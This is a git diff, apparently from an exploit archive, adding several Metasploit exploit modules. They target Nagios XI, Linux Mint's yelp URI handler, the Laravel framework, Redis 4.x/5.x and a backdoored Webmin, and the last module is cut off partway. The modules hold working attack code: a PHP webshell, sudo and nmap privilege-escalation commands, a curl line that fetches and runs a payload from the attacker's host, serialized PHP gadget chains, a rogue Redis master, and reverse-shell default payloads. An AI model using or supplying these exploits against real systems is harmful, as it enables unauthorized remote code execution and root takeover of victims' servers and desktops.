+    register_file_for_cleanup("apache-tomcat-8.5.16/webapps/ROOT/#{tar_name}.jsp")
+    CPITarArchive.new(tar_name, jsp_stager)
+  end
+
+  def execute_payload(tar)
+    # Once executed, we are at:
+    # /opt/CSCOlumos
+    send_request_cgi({
+      'rport'  => datastore['WEBPORT'],
+      'SSL'    => true,
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, tar.jsp_name)
+    })
+  end
+
+  def upload_tar(tar)
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(tar.data, nil, nil, "form-data; name=\"files\"; filename=\"#{tar.tar_name}\"")
+
+    # The file gets uploaded to this path on the server:
+    # /opt/CSCOlumos/apache-tomcat-8.5.16/webapps/ROOT/tar_name.jsp
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'servlet', 'UploadServlet'),
+      'data'   => post_data.to_s,
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'headers' =>
+        {
+          'Destination-Dir' => 'tftpRoot',
+          'Compressed-Archive' => 'false',
+          'Primary-IP' => '127.0.0.1',
+          'Filecount' => '1',
+          'Filename' => tar.tar_name,
+          'FileSize' => tar.length
+        }
+    })
+
+    (res && res.code == 200)
+  end
+
+  def exploit
+    tar = make_tar
+    print_status("Uploading tar file (#{tar.length} bytes)")
+    if upload_tar(tar)
+      print_status('Executing JSP stager...')
+      execute_payload(tar)
+    else
+      print_status("Failed to upload #{tar.tar_name}")
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47039.rb b/exploits/linux/remote/47039.rb
new file mode 100755
index 000000000..8d22c9630
--- /dev/null
+++ b/exploits/linux/remote/47039.rb
@@ -0,0 +1,183 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer::HTML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => "Nagios XI Magpie_debug.php Root Remote Code Execution",
+      'Description'    => %q{
+         This module exploits two vulnerabilities in Nagios XI 5.5.6:
+         CVE-2018-15708 which allows for unauthenticated remote code execution
+         and CVE 2018–15710 which allows for local privilege escalation.
+         When combined, these two vulnerabilities give us a root reverse shell.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Chris Lyne (@lynerc)', # First working exploit
+          'Guillaume André (@yaumn_)' # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2018-15708'],
+          ['CVE', '2018-15710'],
+          ['EDB', '46221'],
+          ['URL', 'https://medium.com/tenable-techblog/rooting-nagios-via-outdated-libraries-bb79427172'],
+          ['URL', 'https://www.tenable.com/security/research/tra-2018-37']
+        ],
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Nagios XI 5.5.6', version: Gem::Version.new('5.5.6')]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => "2018-11-14",
+      'DefaultTarget'  => 0
+     ))
+
+    register_options(
+      [
+        OptString.new('RSRVHOST', [true, 'A public IP at which your host can be reached (e.g. your router IP)']),
+        OptString.new('RSRVPORT', [true, 'The port that will forward to the local HTTPS server', 8080]),
+        OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 5])
+      ])
+
+    @WRITABLE_PATHS = [
+      ['/usr/local/nagvis/share', '/nagvis'],
+      ['/var/www/html/nagiosql',  '/nagiosql']
+    ]
+    @writable_path_index = 0
+    @MAGPIERSS_PATH = '/nagiosxi/includes/dashlets/rss_dashlet/magpierss/scripts/magpie_debug.php'
+    @session_opened = false
+    @webshell_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    @nse_name = "#{Rex::Text.rand_text_alpha(10)}.nse"
+    @meterpreter_name = Rex::Text.rand_text_alpha(10)
+  end
+
+  def on_request_uri(cli, req)
+    if @current_payload == @webshell_name
+      send_response(cli, '<?php system($_GET[\'cmd\'])?>')
+    else
+      send_response(cli, generate_payload_exe)
+    end
+  end
+
+  def primer
+    res = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => normalize_uri(@MAGPIERSS_PATH),
+        'vars_get' => {
+          'url' => "https://#{datastore['RSRVHOST']}:#{datastore['RSRVPORT']}#{get_resource} " +
+          '-o ' + @WRITABLE_PATHS[@writable_path_index][0] + "/#{@current_payload}"
+        }
+      }, 5)
+
+    if !res || res.code != 200
+      print_error('Couldn\'t send malicious request to target.')
+    end
+ end
+
+  def check_upload
+    res = send_request_cgi(
+      {
+        'method' => 'GET',
+        'uri'    => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@current_payload}")
+      }, 5)
+    if res && res.code == 200
+      print_status("#{@current_payload} uploaded with success!")
+      return true
+    else
+      print_error("Couldn't upload #{@current_payload}.")
+      return false
+    end
+  end
+
+  def check
+    res = send_request_cgi(
+      {
+        'method'  => 'GET',
+        'uri'     => normalize_uri(@MAGPIERSS_PATH)
+      }, 5)
+
+    if res && res.code == 200
+      return Exploit::CheckCode::Appears
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    all_files_uploaded = false
+
+    # Upload useful files on the target
+    for i in 0..@WRITABLE_PATHS.size
+      @writable_path_index = i
+      for filename in [@webshell_name, @meterpreter_name]
+        @current_payload = filename
+        begin
+          Timeout.timeout(datastore['HTTPDELAY']) { super }
+        rescue Timeout::Error
+          if !check_upload
+            break
+          elsif filename == @meterpreter_name
+            all_files_uploaded = true
+          end
+        end
+      end
+      if all_files_uploaded
+        break
+      end
+    end
+
+    meterpreter_path = "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@meterpreter_name}"
+
+    register_file_for_cleanup(
+      "#{@WRITABLE_PATHS[@writable_path_index][0]}/#{@webshell_name}",
+      meterpreter_path,
+      "/var/tmp/#{@nse_name}"
+    )
+
+    # Commands to escalate privileges, some will work and others won't
+    # depending on the Nagios version
+    cmds = [
+      "chmod +x #{meterpreter_path} && sudo php /usr/local/nagiosxi/html/includes/" \
+      "components/autodiscovery/scripts/autodiscover_new.php --addresses=\'127.0.0.1/1`#{meterpreter_path}`\'",
+      "echo 'os.execute(\"#{meterpreter_path}\")' > /var/tmp/#{@nse_name} " \
+      "&& sudo nmap --script /var/tmp/#{@nse_name}"
+   ]
+
+    # Try to launch root shell
+    for cmd in cmds
+      res = send_request_cgi(
+        {
+          'uri'     => normalize_uri("#{@WRITABLE_PATHS[@writable_path_index][1]}/#{@webshell_name}"),
+          'method'  => 'GET',
+          'vars_get' => {
+            'cmd' => cmd
+          }
+        }, 5)
+
+      if !res && session_created?
+        break
+      end
+      print_status('Couldn\'t get remote root shell, trying another method')
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47047.rb b/exploits/linux/remote/47047.rb
new file mode 100755
index 000000000..95b105c12
--- /dev/null
+++ b/exploits/linux/remote/47047.rb
@@ -0,0 +1,94 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+# Exploit from github repro: https://github.com/b1ack0wl/linux_mint_poc
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Linux Mint 'yelp' URI handler command injection vulnerability",
+      'Description'    => %q{
+          This module exploits a vulnerability within the "ghelp", "help" and "man" URI handlers within 
+          Linux Mint's "ubuntu-system-adjustments" package. Invoking any one the URI handlers will call 
+          the python script "/usr/local/bin/yelp" with the contents of the supplied URI handler as its argument. 
+          The script will then search for the strings "gnome-help" or "ubuntu-help" and if doesn't find either 
+          of them it'll then execute os.system("/usr/bin/yelp %s" % args). User interaction is required to exploit 
+          this vulnerability.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'b1ack0wl' # vuln discovery and exploit dev
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 60
+        },
+      'Platform'       => 'linux',
+      'Targets'        =>
+        [
+          [ 'Linux Mint 18.3 and 19.1',
+            {
+              'Arch' => ARCH_X64
+            } 
+          ]
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0))
+  end
+
+  def generate_exploit_html()
+    if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+      srv_host = datastore['LHOST']
+    else
+      srv_host = datastore['SRVHOST']
+    end
+    @filename = rand_text_alpha(4)
+    cmd_inj = "curl http://#{srv_host}:#{datastore['SRVPORT']}/#{@service_path} -o /tmp/#{@filename};chmod 777 /tmp/#{@filename};/tmp/#{@filename} &".gsub(' ','$IFS$()') # Cheap way to add spaces since chrome percent encodes spaces (%20).
+    html = %Q|
+    <html>
+    <head>
+      <meta content="text/html;charset=utf-8" http-equiv="Content-Type">
+      <meta content="utf-8" http-equiv="encoding">
+      <title>paparoachfanclubdotcom</title>
+    </head>
+    <body>
+    <script>
+      lmao = document.createElement('a');
+      lmao.href= "ghelp://$(#{cmd_inj})";
+      document.body.appendChild(lmao); /* Needed to work with Firefox */
+      lmao.click();
+    </script>
+    </body>
+    </html>
+    |
+    return html
+  end
+
+  def on_request_uri(cli, request)
+    agent = request.headers['User-Agent']
+    if agent =~ /curl\/\d/
+      # Command has been executed. Serve up the payload
+      exe_payload = generate_payload_exe()
+      print_status("Sending payload...")
+      send_response(cli, exe_payload)
+      register_file_for_cleanup("/tmp/#{@filename}")
+      return
+    else
+      html = generate_exploit_html()
+      print_status("Sending HTML...")
+      send_response(cli, html, {'Content-Type'=>'text/html'})
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47129.rb b/exploits/linux/remote/47129.rb
new file mode 100755
index 000000000..54f31f977
--- /dev/null
+++ b/exploits/linux/remote/47129.rb
@@ -0,0 +1,223 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'PHP Laravel Framework token Unserialize Remote Command Execution',
+      'Description' => %q{
+        This module exploits a vulnerability in the PHP Laravel Framework for versions 5.5.40, 5.6.x <= 5.6.29.
+        Remote Command Execution is possible via a correctly formatted HTTP X-XSRF-TOKEN header, due to
+        an insecure unserialize call of the decrypt method in Illuminate/Encryption/Encrypter.php.
+        Authentication is not required, however exploitation requires knowledge of the Laravel APP_KEY.
+        Similar vulnerabilities appear to exist within Laravel cookie tokens based on the code fix.
+        In some cases the APP_KEY is leaked which allows for discovery and exploitation.
+      },
+      'DisclosureDate' => '2018-08-07',
+      'Author' =>
+        [
+          'Ståle Pettersen',  # Discovery
+          'aushack',          # msf exploit + other leak
+        ],
+      'References' =>
+        [
+          ['CVE', '2018-15133'],
+          ['CVE', '2017-16894'],
+          ['URL', 'https://github.com/kozmic/laravel-poc-CVE-2018-15133'],
+          ['URL', 'https://laravel.com/docs/5.6/upgrade#upgrade-5.6.30'],
+          ['URL', 'https://github.com/laravel/framework/pull/25121/commits/d84cf988ed5d4661a4bf1fdcb08f5073835083a0']
+        ],
+      'License' => MSF_LICENSE,
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'DefaultTarget' => 0,
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },
+      'Payload' => { 'DisableNops' => true },
+      'Targets' => [[ 'Automatic', {} ]],
+    ))
+
+    register_options([
+      OptString.new('TARGETURI', [ true, 'Path to target webapp', '/']),
+      OptString.new('APP_KEY', [ false, 'The base64 encoded APP_KEY string from the .env file', ''])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'GET'
+    })
+
+    # Can be 'XSRF-TOKEN', 'X-XSRF-TOKEN', 'laravel_session', or $appname_session... and maybe more?
+    unless res && res.headers && res.headers.to_s =~ /XSRF-TOKEN|laravel_session/i
+      return CheckCode::Unknown
+    end
+
+    auth_token = check_appkey
+    if auth_token.blank? || test_appkey(auth_token) == false
+      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+      return CheckCode::Detected
+    end
+
+    random_string = Rex::Text.rand_text_alphanumeric(12)
+
+    1.upto(4) do |method|
+      vuln = generate_token("echo #{random_string}", auth_token, method)
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+          'X-XSRF-TOKEN' => "#{vuln}",
+        }
+      })
+
+      if res.body.include?(random_string)
+        return CheckCode::Vulnerable
+      # Not conclusive but witnessed in the wild
+      elsif res.body.include?('Method Not Allowed')
+        return CheckCode::Safe
+      end
+    end
+    CheckCode::Detected
+  rescue Rex::ConnectionError
+    CheckCode::Unknown
+  end
+
+  def env_leak
+    key = ''
+    vprint_status 'Checking for CVE-2017-16894 .env information leak'
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '.env'),
+      'method' => 'GET'
+    })
+
+    # Good but may be other software. Can also check for 'APP_NAME=Laravel' etc
+    return key unless res && res.body.include?('APP_KEY') && res.body =~ /APP_KEY\=base64:(.*)/
+    key = $1
+
+    if key
+      vprint_good "APP_KEY Found via CVE-2017-16894 .env information leak: #{key}"
+      return key
+    end
+
+    vprint_status 'Website .env file exists but didn\'t find a suitable APP_KEY'
+    key
+  end
+
+  def framework_leak(decrypt_ex = true)
+    key = ''
+    if decrypt_ex
+      # Possible config error / 0day found by aushack during pentest
+      # Seen in the wild with recent releases
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+          'X-XSRF-TOKEN' => Rex::Text.rand_text_alpha(1) # May trigger
+        }
+      })
+
+      return key unless res && res.body.include?('DecryptException') && res.body.include?('APP_KEY')
+    else
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST'
+      })
+
+      return key unless res && res.body.include?('MethodNotAllowedHttpException') && res.body.include?('APP_KEY')
+    end
+    # Good sign but might be more universal with e.g. 'vendor/laravel/framework' ?
+
+    # Leaks all environment config including passwords for databases, AWS, REDIS, SMTP etc... but only the APP_KEY appears to use base64
+    if res.body =~ /\>base64:(.*)\<\/span\>/
+      key = $1
+      vprint_good "APP_KEY Found via Laravel Framework error information leak: #{key}"
+    end
+
+    key
+  end
+
+  def check_appkey
+    key = datastore['APP_KEY'].present? ? datastore['APP_KEY'] : ''
+    return key unless key.empty?
+
+    vprint_status 'APP_KEY not set. Will try to find it...'
+    key = env_leak
+    key = framework_leak if key.empty?
+    key = framework_leak(false) if key.empty?
+    key.empty? ? false : key
+  end
+
+  def test_appkey(value)
+    value = Rex::Text.decode_base64(value)
+    return true if value && value.length.to_i == 32
+
+    false
+  end
+
+  def generate_token(cmd, key, method)
+    # Ported phpggc Laravel RCE php objects :)
+    case method
+      when 1
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:15:"Faker\Generator":1:{s:13:"' + "\x00" + '*' + "\x00" + 'formatters";a:1:{s:8:"dispatch";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+      when 2
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:28:"Illuminate\Events\Dispatcher":1:{s:12:"' + "\x00" + '*' + "\x00" + 'listeners";a:1:{s:' + cmd.length.to_s + ':"' + cmd + '";a:1:{i:0;s:6:"system";}}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+      when 3
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":1:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:39:"Illuminate\Notifications\ChannelManager":3:{s:6:"' + "\x00" + '*' + "\x00" + 'app";s:' + cmd.length.to_s + ':"' + cmd + '";s:17:"' + "\x00" + '*' + "\x00" + 'defaultChannel";s:1:"x";s:17:"' + "\x00" + '*' + "\x00" + 'customCreators";a:1:{s:1:"x";s:6:"system";}}}'
+      when 4
+      payload_decoded = 'O:40:"Illuminate\Broadcasting\PendingBroadcast":2:{s:9:"' + "\x00" + '*' + "\x00" + 'events";O:31:"Illuminate\Validation\Validator":1:{s:10:"extensions";a:1:{s:0:"";s:6:"system";}}s:8:"' + "\x00" + '*' + "\x00" + 'event";s:' + cmd.length.to_s + ':"' + cmd + '";}'
+    end
+
+    cipher = OpenSSL::Cipher.new('AES-256-CBC') # Or AES-128-CBC - untested
+    cipher.encrypt
+    cipher.key = Rex::Text.decode_base64(key)
+    iv = cipher.random_iv
+
+    value = cipher.update(payload_decoded) + cipher.final
+    pload = Rex::Text.encode_base64(value)
+    iv = Rex::Text.encode_base64(iv)
+    mac = OpenSSL::HMAC.hexdigest('SHA256', Rex::Text.decode_base64(key), iv+pload)
+    iv = iv.gsub('/', '\\/') # Escape slash
+    pload = pload.gsub('/', '\\/') # Escape slash
+    json_value = %Q({"iv":"#{iv}","value":"#{pload}","mac":"#{mac}"})
+    json_out = Rex::Text.encode_base64(json_value)
+
+    json_out
+  end
+
+  def exploit
+    auth_token = check_appkey
+    if auth_token.blank? || test_appkey(auth_token) == false
+      vprint_error 'Unable to continue: the set datastore APP_KEY value or information leak is invalid.'
+      return
+    end
+
+    1.upto(4) do |method|
+      sploit = generate_token(payload.encoded, auth_token, method)
+
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'index.php'),
+        'method' => 'POST',
+        'headers' => {
+        'X-XSRF-TOKEN' => sploit,
+        }
+      }, 5)
+
+      # Stop when one of the deserialization attacks works
+      break if session_created?
+
+      if res && res.body.include?('The MAC is invalid|Method Not Allowed') # Not conclusive
+        print_status 'Target appears to be patched or otherwise immune'
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47195.rb b/exploits/linux/remote/47195.rb
new file mode 100755
index 000000000..d87601b52
--- /dev/null
+++ b/exploits/linux/remote/47195.rb
@@ -0,0 +1,271 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  include Msf::Auxiliary::Redis
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Redis Unauthenticated Code Execution',
+      'Description'    => %q{
+        This module can be used to leverage the extension functionality added by Redis 4.x and 5.x
+        to execute arbitrary code. To transmit the given extension it makes use of the feature of Redis
+        which called replication between master and slave.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Green-m  <greenm.xxoo[at]gmail.com>'     # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'URL', 'https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf'],
+          [ 'URL', 'https://github.com/RedisLabs/RedisModulesSDK']
+        ],
+
+      'Platform'       => 'linux',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          ['Automatic',  {} ],
+        ],
+      'DefaultOptions' => {
+          'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+          'SRVPORT' => '6379'
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Nov 13 2018',
+      'DefaultTarget'  => 0,
+      'Notes'          =>
+        {
+          'Stability'   => [ SERVICE_RESOURCE_LOSS],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES, IOC_IN_LOGS, ]
+        },
+      ))
+
+    register_options(
+      [
+        Opt::RPORT(6379),
+        OptBool.new('CUSTOM', [true, 'Whether compile payload file during exploiting', true])
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('RedisModuleInit', [false, 'The command of module to load and unload. Random string as default.']),
+        OptString.new('RedisModuleTrigger', [false, 'The command of module to trigger the given function. Random string as default.']),
+        OptString.new('RedisModuleName', [false, 'The name of module to load at first. Random string as default.'])
+      ]
+    )
+    deregister_options('URIPATH', 'THREADS', 'SSLCert')
+  end
+
+  #
+  # Now tested on redis 4.x and 5.x
+  #
+  def check
+    connect
+    # they are only vulnerable if we can run the CONFIG command, so try that
+    return Exploit::CheckCode::Safe unless (config_data = redis_command('CONFIG', 'GET', '*')) && config_data =~ /dbfilename/
+
+    if (info_data = redis_command('INFO')) && /redis_version:(?<redis_version>\S+)/ =~ info_data
+      report_redis(redis_version)
+    end
+
+    Exploit::CheckCode::Vulnerable
+  ensure
+    disconnect
+  end
+
+  def exploit
+    if check_custom
+      @module_init_name = datastore['RedisModuleInit']    || Rex::Text.rand_text_alpha_lower(4..8)
+      @module_cmd       = datastore['RedisModuleTrigger'] || "#{@module_init_name}.#{Rex::Text.rand_text_alpha_lower(4..8)}"
+    else
+      @module_init_name = 'shell'
+      @module_cmd       = 'shell.exec'
+    end
+
+    if srvhost == '0.0.0.0'
+      fail_with(Failure::BadConfig, 'Make sure SRVHOST not be 0.0.0.0, or the slave failed to find master.')
+    end
+
+    #
+    # Prepare for payload.
+    #
+    #  1. Use custcomed payload, it would compile a brand new file during running, which is more undetectable.
+    #     It's only worked on linux system.
+    #
+    #  2. Use compiled payload, it's avaiable on all OS, however more detectable.
+    #
+    if check_custom
+      buf = create_payload
+      generate_code_file(buf)
+      compile_payload
+    end
+
+    connect
+
+    #
+    # Send the payload.
+    #
+    redis_command('SLAVEOF', srvhost, srvport.to_s)
+    redis_command('CONFIG', 'SET', 'dbfilename', "#{module_file}")
+    ::IO.select(nil, nil, nil, 2.0)
+
+    # start the rogue server
+    start_rogue_server
+    # waiting for victim to receive the payload.
+    Rex.sleep(1)
+    redis_command('MODULE', 'LOAD', "./#{module_file}")
+    redis_command('SLAVEOF', 'NO', 'ONE')
+
+    # Trigger it.
+    print_status('Sending command to trigger payload.')
+    pull_the_trigger
+
+    # Clean up
+    Rex.sleep(2)
+    register_file_for_cleanup("./#{module_file}")
+    #redis_command('CONFIG', 'SET', 'dbfilename', 'dump.rdb')
+    #redis_command('MODULE', 'UNLOAD', "#{@module_init_name}")
+
+  ensure
+    disconnect
+  end
+
+  #
+  # We pretend to be a real redis server, and then slave the victim.
+  #
+  def start_rogue_server
+    socket = Rex::Socket::TcpServer.create({'LocalHost'=>srvhost,'LocalPort'=>srvport})
+    print_status("Listening on #{srvhost}:#{srvport}")
+    rsock = socket.accept()
+    vprint_status('Accepted a connection')
+
+    # Start negotiation
+    while true
+      request = rsock.read(1024)
+      vprint_status("in<<< #{request.inspect}")
+      response = ""
+      finish = false
+
+      case
+      when request.include?('PING')
+        response = "+PONG\r\n"
+      when request.include?('REPLCONF')
+        response = "+OK\r\n"
+      when request.include?('PSYNC') || request.include?('SYNC')
+        response  = "+FULLRESYNC #{'Z'*40} 1\r\n"
+        response << "$#{payload_bin.length}\r\n"
+        response << "#{payload_bin}\r\n"
+        finish = true
+      end
+
+      if response.length < 200
+        vprint_status("out>>> #{response.inspect}")
+      else
+        vprint_status("out>>> #{response.inspect[0..100]}......#{response.inspect[-100..-1]}")
+      end
+
+      rsock.put(response)
+
+      if finish
+        print_status('Rogue server close...')
+        rsock.close()
+        socket.close()
+        break
+      end
+    end
+  end
+
+  def pull_the_trigger
+    if check_custom
+      redis_command("#{@module_cmd}")
+    else
+      execute_cmdstager
+    end
+  end
+
+  #
+  # Parpare command stager for the pre-compiled payload.
+  # And the command of module is hard-coded.
+  #
+  def execute_command(cmd, opts = {})
+    redis_command('shell.exec',"#{cmd.to_s}") rescue nil
+  end
+
+  #
+  # Generate source code file of payload to be compiled dynamicly.
+  #
+  def generate_code_file(buf)
+    template       = File.read(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.erb'))
+    File.open(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.c'), 'wb') { |file| file.write(ERB.new(template).result(binding))}
+  end
+
+  def compile_payload
+    make_file = File.join(Msf::Config.data_directory, 'exploits', 'redis', 'Makefile')
+    vprint_status("Clean old files")
+    vprint_status(%x|make -C #{File.dirname(make_file)}/rmutil clean|)
+    vprint_status(%x|make -C #{File.dirname(make_file)} clean|)
+
+    print_status('Compile redis module extension file')
+    res = %x|make -C #{File.dirname(make_file)} -f #{make_file} && echo true|
+    if res.include? 'true'
+      print_good("Payload generated successfully! ")
+    else
+      print_error(res)
+      fail_with(Failure::BadConfig, 'Check config of gcc compiler.')
+    end
+  end
+
+  #
+  # check the environment for compile payload to so file.
+  #
+  def check_env
+    # check if linux
+    return false unless %x|uname -s 2>/dev/null|.include? "Linux"
+    # check if gcc installed
+    return false unless %x|command -v gcc && echo true|.include? "true"
+    # check if ld installed
+    return false unless %x|command -v ld && echo true|.include? "true"
+
+    true
+  end
+
+  def check_custom
+    return @custom_payload if @custom_payload
+
+    @custom_payload = false
+    @custom_payload = true if check_env && datastore['CUSTOM']
+
+    @custom_payload
+  end
+
+  def module_file
+    return @module_file if @module_file
+    @module_file = datastore['RedisModuleName']  || "#{Rex::Text.rand_text_alpha_lower(4..8)}.so"
+  end
+
+  def create_payload
+    p = payload.encoded
+    Msf::Simple::Buffer.transform(p, 'c', 'buf')
+  end
+
+  def payload_bin
+    return @payload_bin if @payload_bin
+    if check_custom
+      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'module.so'))
+    else
+      @payload_bin = File.binread(File.join(Msf::Config.data_directory, 'exploits', 'redis', 'exp',  'exp.so'))
+    end
+    @payload_bin
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/remote/47230.rb b/exploits/linux/remote/47230.rb
new file mode 100755
index 000000000..f784eb136
--- /dev/null
+++ b/exploits/linux/remote/47230.rb
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Webmin 1.920 Unauthenticated RCE',
+      'Description'        => %q{
+        This module exploits a backdoor in Webmin versions 1.890 through 1.920.
+        Only the SourceForge downloads were backdoored, but they are listed as
+        official downloads on the project's site.
+
+        Unknown attacker(s) inserted Perl qx statements into the build server's
+        source code on two separate occasions: once in April 2018, introducing
+        the backdoor in the 1.890 release, and in July 2018, reintroducing the
+        backdoor in releases 1.900 through 1.920.
+
+        Only version 1.890 is exploitable in the default install. Later affected
+        versions require the expired password changing feature to be enabled.
+      },
+      'Author'         => [
+        'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
+      ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-'],
+          ['URL', 'https://www.pentest.com.tr']
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'Space'       => 512,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd'
+            }
+        },
+      'DefaultOptions' =>
+        {
+          'RPORT' => 10000,
+          'SSL'   => false,
+          'PAYLOAD' => 'cmd/unix/reverse_python'
+        },
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        => [['Webmin <= 1.910', {}]],
+      'DisclosureDate' => 'May 16 2019',
+      'DefaultTarget'  => 0)
+    )
+    register_options [
+        OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
+    ]
+  end
+
+  def peer
+    "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
+  end
+  ##
+  # Target and input verification
+  ##
+  def check
+    # check passwd change priv
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
+      'headers' =>
+        {
+          'Referer' => "#{peer}/session_login.cgi"
+        },
+      'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
+    })
+
+    if res && res.code == 200 && res.body =~ /Failed/
+      res = send_request_cgi(
+        {
+        'method' => 'POST',
+        'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
+        'ctype'  => 'application/x-www-form-urlencoded',
+        'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
+        'headers' =>
+          {
+            'Referer' => "#{peer}/session_login.cgi"
+          },
+        'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
+        })
+
+      if res && res.code == 200 && res.body =~ /password_change.cgi/
+        return CheckCode::Vulnerable
+      else
+        return CheckCode::Safe
+      end
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  ##
+  # Exploiting phase
+  ##
+  def exploit
+
+    unless Exploit::CheckCode::Vulnerable == check
+      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
+    end
+
+    command = payload.encoded
+    print_status("Attempting to execute the payload...")
+    handler
+    res = send_request_cgi(
+      {
+      'method' => 'POST',
